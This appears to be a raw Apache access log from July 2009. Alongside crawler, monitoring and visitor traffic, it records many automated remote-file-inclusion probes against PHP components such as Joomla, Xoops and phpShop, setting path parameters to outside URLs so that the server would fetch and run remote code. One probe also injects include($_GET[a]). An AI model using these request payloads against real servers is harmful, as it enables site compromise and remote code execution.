65.23.158.226 - - [26/Jul/2009:03:58:10 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:58:10 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:58:58 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:58:58 -0400] "GET /logs/access_log.Q109060100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:59:49 -0400] "GET /logs/access_log.Q109051600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:59:49 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:59:49 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:03:59:54 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:04:00:07 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:04:00:07 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:04:00:07 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:04:00:13 -0400] "GET /logs/access_log.Q109071200/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:04:00:22 -0400] "GET //include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:04:00:22 -0400] "GET /logs//include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:04:00:23 -0400] "GET /logs/access_log.Q109063000//include/write.php?dir=http://aboutav.com/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:00:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A24295949900BFD2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:04:01:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:04:01:46 -0400] "GET /images/_notes/nav_store_index.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
219.66.38.103 - - [26/Jul/2009:04:01:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
219.66.38.103 - - [26/Jul/2009:04:01:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
219.66.38.103 - - [26/Jul/2009:04:02:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
219.66.38.103 - - [26/Jul/2009:04:02:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322)"
89.111.190.63 - - [26/Jul/2009:04:02:06 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.111.190.63 - - [26/Jul/2009:04:02:07 -0400] "GET /logs/access_log.Q109071200%20%20/e404.php?DOCUMENT_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:04:03:52 -0400] "GET /logs/error_log.Q109051900%20/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:04:03:52 -0400] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:04:03:52 -0400] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:04:04:26 -0400] "GET /logs/access_log.Q109063000/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
87.106.210.178 - - [26/Jul/2009:04:04:57 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
66.249.68.247 - - [26/Jul/2009:04:05:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0127F14093445900AEA200K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:04:06:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:04:08:22 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L40676F382722E10033C200H+WSEQ(S0060):1+OUITEM(A0200):5096000 HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:04:08:23 -0400] "GET /images/_notes/ace_bkgrd_wide_r1_c1.gif.mno HTTP/1.1" 200 263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
122.153.28.140 - - [26/Jul/2009:04:08:33 -0400] "GET /phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:04:08:36 -0400] "GET /logs/phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:04:08:37 -0400] "GET /logs/access_log.Q109071100/phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:04:09:10 -0400] "GET /logs/access_log.Q109060100/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
122.153.28.140 - - [26/Jul/2009:04:09:12 -0400] "GET /logs/error_log.Q109071100/phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:09:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A2429574F900B4D2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:04:11:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.28.140 - - [26/Jul/2009:04:11:58 -0400] "GET /logs/access_log.Q109071100%20%20/phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
122.153.28.140 - - [26/Jul/2009:04:11:58 -0400] "GET /logs/error_log.Q109071100%20%20/phpshop/index.php?base_dir=http://bibdigital.epn.edu.ec//m1.gif??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:04:13:41 -0400] "GET /logs/addons/guildbank/searcharrays.php?addonDir=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:04:13:41 -0400] "GET /logs/access_log.Q109070200/addons/guildbank/searcharrays.php?addonDir=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:04:13:41 -0400] "GET /addons/guildbank/searcharrays.php?addonDir=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:13:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0127F14093245900A8A200K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [26/Jul/2009:04:14:52 -0400] "GET /modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:14:52 -0400] "GET /logs/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:14:52 -0400] "GET /logs/access_log.Q109061300/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:14:55 -0400] "GET /images/_notes/nav04_shop_off.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [26/Jul/2009:04:14:58 -0400] "GET /logs/access_log.Q109062100/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:04:16:17 -0400] "GET /logs/access_log.Q109070300%20%20/?sIncPath=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:04:16:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.23.158.226 - - [26/Jul/2009:04:17:11 -0400] "GET /logs/access_log.Q109061300%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:17:15 -0400] "GET /logs/access_log.Q109062100%20%20/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
220.231.126.252 - - [26/Jul/2009:04:17:21 -0400] "GET /logs/access_log.Q109062900%20%20/?sIncPath=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:18:20 -0400] "GET /logs/access_log.Q109051500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:18:20 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:18:20 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [26/Jul/2009:04:18:20 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:04:18:39 -0400] "GET /logs/access_log.Q109070200%20%20/addons/guildbank/searcharrays.php?addonDir=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
66.249.68.79 - - [26/Jul/2009:04:19:39 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A24295C48900B3D2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.53.70.114 - - [26/Jul/2009:04:20:00 -0400] "GET /logs/error_log.Q109070300/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:04:21:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.22.169 - - [26/Jul/2009:04:21:28 -0400] "GET /logs/error_log.Q109012100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.68.247 - - [26/Jul/2009:04:21:31 -0400] "GET /images/_notes/download_RCM_info.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.53.70.114 - - [26/Jul/2009:04:22:02 -0400] "GET /logs/access_log.Q109062200/?sIncPath=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.249.68.79 - - [26/Jul/2009:04:23:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0127F1409394D900ACA200K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.23.158.226 - - [26/Jul/2009:04:24:29 -0400] "GET /logs/access_log.Q109051700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://bebe.abril.com.br/album/imagens/id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.4.8.14 - - [26/Jul/2009:04:25:06 -0400] "GET /logs/access_log.Q109070800/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
114.4.8.14 - - [26/Jul/2009:04:25:07 -0400] "GET /article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
114.4.8.14 - - [26/Jul/2009:04:25:07 -0400] "GET /logs/article/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
209.59.12.99 - - [26/Jul/2009:04:26:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.88.155 - - [26/Jul/2009:04:26:33 -0400] "GET /logs/access_log.Q109052000/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:04:26:33 -0400] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:04:26:34 -0400] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:27:08 -0400] "GET /errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:27:08 -0400] "GET /logs/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:27:08 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:28:06 -0400] "GET /images/_notes/home_connect_off.gif.mno HTTP/1.1" 200 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.248.88.155 - - [26/Jul/2009:04:28:12 -0400] "GET /logs/access_log.Q109052000%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
204.11.17.16 - - [26/Jul/2009:04:28:22 -0400] "GET /logs/access_log.Q109070500/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
204.11.17.16 - - [26/Jul/2009:04:28:22 -0400] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
204.11.17.16 - - [26/Jul/2009:04:28:22 -0400] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:04:28:33 -0400] "GET /logs/access_log.Q109051500%20%20/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
202.125.45.45 - - [26/Jul/2009:04:28:58 -0400] "GET /logs/access_log.Q109051000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:28:58 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:28:58 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:29:35 -0400] "GET /logs/error_log.Q109051000/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:29:58 -0400] "GET /logs/error_log.Q109052300/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:29:58 -0400] "GET /logs/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:29:58 -0400] "GET /index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [26/Jul/2009:04:30:29 -0400] "GET /logs/access_log.Q109061500/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.6.22.169 - - [26/Jul/2009:04:30:48 -0400] "GET /logs/error_log.Q108120600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.125.45.45 - - [26/Jul/2009:04:31:09 -0400] "GET /logs/error_log.Q109062900%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
204.11.17.16 - - [26/Jul/2009:04:31:10 -0400] "GET /logs/access_log.Q109070500%20%20/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:04:31:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:04:32:16 -0400] "GET //admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:32:16 -0400] "GET /logs/access_log.Q109050700//admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:32:16 -0400] "GET /logs//admin/classes/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:32:32 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:32:40 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.88.155 - - [26/Jul/2009:04:32:56 -0400] "GET /logs/access_log.Q109051500/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.cisc.at/survey/classes/core/v4.5id1? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
202.125.45.45 - - [26/Jul/2009:04:33:43 -0400] "GET /logs/access_log.Q109061500%20/index1.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.249.68.247 - - [26/Jul/2009:04:34:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS%20(S0040):0 HTTP/1.1" 200 63436 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:04:34:41 -0400] "GET /images/_notes/home_shopping_off.gif.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.20.186.139 - - [26/Jul/2009:04:35:24 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:04:36:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.34.122 - - [26/Jul/2009:04:37:17 -0400] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/logi.txt??????? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
61.109.250.29 - - [26/Jul/2009:04:38:58 -0400] "GET /errors.php?error=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:04:38:58 -0400] "GET /logs/errors.php?error=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.109.250.29 - - [26/Jul/2009:04:39:00 -0400] "GET /logs/access_log.Q109061000/errors.php?error=http://ohyunbook.com/rgboard/data/neter/fxid.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:39:13 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:04:39:52 -0400] "GET /logs/access_log.Q109070200/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:04:39:52 -0400] "GET /logs/access_log.Q109063000/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:04:39:52 -0400] "GET /?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.110.19.24 - - [26/Jul/2009:04:39:52 -0400] "GET /logs/?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 200 11066 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:04:41:16 -0400] "GET /images/_notes/headline_buy5.jpg.mno HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:04:41:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:04:41:49 -0400] "GET /images/nav04_myaccount_off.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
87.20.186.139 - - [26/Jul/2009:04:41:51 -0400] "GET //common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:04:41:51 -0400] "GET /logs//common/db.php?commonpath=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:04:41:56 -0400] "GET //png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:04:41:56 -0400] "GET /logs//png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
87.106.210.178 - - [26/Jul/2009:04:41:56 -0400] "GET /logs/access_log.Q109070800//png.php?include_path=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
